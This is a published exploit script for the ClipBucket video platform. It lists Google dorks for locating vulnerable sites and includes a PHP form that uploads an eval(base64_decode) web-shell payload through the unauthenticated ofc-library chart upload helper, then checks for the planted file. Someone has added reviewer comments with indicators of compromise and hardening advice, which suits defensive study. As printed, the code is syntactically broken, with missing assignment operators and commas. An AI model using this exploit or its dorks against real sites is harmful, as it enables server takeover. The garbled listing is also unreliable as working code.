
ClipBucket Code Injection To Remote Upload

Author: Dr.AFN[D]ENA , Published: 15-12-2014

<form method="POST">

<h3>Exploit ClipBucket </h3>
<h5>Dork : inurl:view_group_members.php</h5>
<h5>Dork : intext:Forged by ClipBucket=</h5>
<h5>Dork : inurl:"view_page.php?pid="+int­ext:"video"</h5>
 
<input type="text" name="host" size=50 />
<input type="submit" value="upload" name="go" />
</form>
<?php
/*
* ClipBucket Code Injection To Remote Upload
* By Dr.AFN[D]ENA
*
* Reviewer summary (defensive reading):
* - When the form above is submitted, the script sends a single POST with a
*   text/plain body to
*   <host>/admin_area/charts/ofc-library/ofc_upload_image.php?name=afndena.php
*   and then requests <host>/admin_area/charts/tmp-upload-images/Dz.php,
*   reporting success when the status line contains "200".
* - No cookie, token or credential is attached to either request, so the
*   technique presumably relies on the upload helper accepting anonymous
*   requests and storing the request body under a caller-chosen file name,
*   extension included -- confirm against the installed ofc-library code.
* - Indicators to search for on a ClipBucket host: access-log entries for
*   ofc_upload_image.php with a name= value ending in .php, and files named
*   afndena.php or Dz.php under admin_area/charts/tmp-upload-images/.
* - Hardening: remove or block web access to the ofc-library upload helper,
*   require an authenticated admin session for everything under admin_area/,
*   and disable script execution in the tmp-upload-images directory.
* - The listing is reproduced as extracted and does not parse as PHP.
*/

// Runs only when the submit button was posted and the host field is non-empty;
// the host value is used as given, with no validation of scheme or target.
if(isset($_POST['go']) and $_POST['host'] != "" ){
$host $_POST['host'];
$x00x curl_init();
// Target is the chart library's upload helper; name= asks for a .php file name.
curl_setopt($x00xCURLOPT_URL,$host."/admin_area/charts/ofc-library/ofc_upload_image.php?name=afndena.php");
curl_setopt($x00xCURLOPT_POST1);
// The body is declared as text/plain and contains PHP source (an eval of a
// base64 blob, elided in this copy) rather than image data.
curl_setopt($x00xCURLOPT_HTTPHEADER, array('Content-Type: text/plain'));
curl_setopt($x00xCURLOPT_POSTFIELDS,"<? eval(base64_decode(\"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\")); ?>");
curl_setopt($x00x,CURLOPT_RETURNTRANSFER,1);
// The upload response is captured in $res but never inspected.
$res curl_exec($x00x);
// Success is judged by a second request into the upload directory instead.
$test get_headers("$host/admin_area/charts/tmp-upload-images/Dz.php");
// eregi() was removed in PHP 7.0; here it does a case-insensitive match for
// "200" anywhere in the first response header line.
if(
eregi("200",$test[0])){
// NOTE(review): $host is echoed into the href without HTML escaping.
echo 
"[+] Upload Link : <a href=\"$host/admin_area/charts/tmp-upload-images/Dz.php\" > Here </a>";
}else {echo 
"[+] Exploit Filed";}
}
?>
